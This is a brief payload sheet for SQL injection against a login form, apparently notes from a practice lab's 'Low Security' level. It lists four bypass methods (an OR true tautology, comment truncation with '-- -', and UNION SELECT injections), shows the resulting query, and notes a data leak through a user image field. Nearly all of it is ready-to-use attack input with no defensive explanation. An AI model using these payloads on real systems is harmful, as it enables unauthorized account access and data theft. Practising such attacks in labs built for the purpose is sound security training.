## ======================================================
##           Low Security
## ======================================================

METHOD One:

	ADMIN : admin' OR true LIMIT 1 #
	PASSWORD : Doesn't Matter

	QUERY 
		"SELECT * FROM `users` WHERE user='admin' OR true LIMIT 1 #' AND password='$pass';"

METHOD TWO:
	ADMIN : admin' -- -


METHOD THREE:
	Admin : admin' UNION SELECT 1,2,3,4,5,6 LIMIT 1 -- -


METHOD FOUR:
	Admin : ' UNION SELECT 1,2,3,4,5,6 LIMIT 1 -- -

	Note: 		Also Detected, Data Leak From Image User 

	Admin : ' UNION SELECT 1,2,3,4,5,'OOHYES' LIMIT 1 -- -
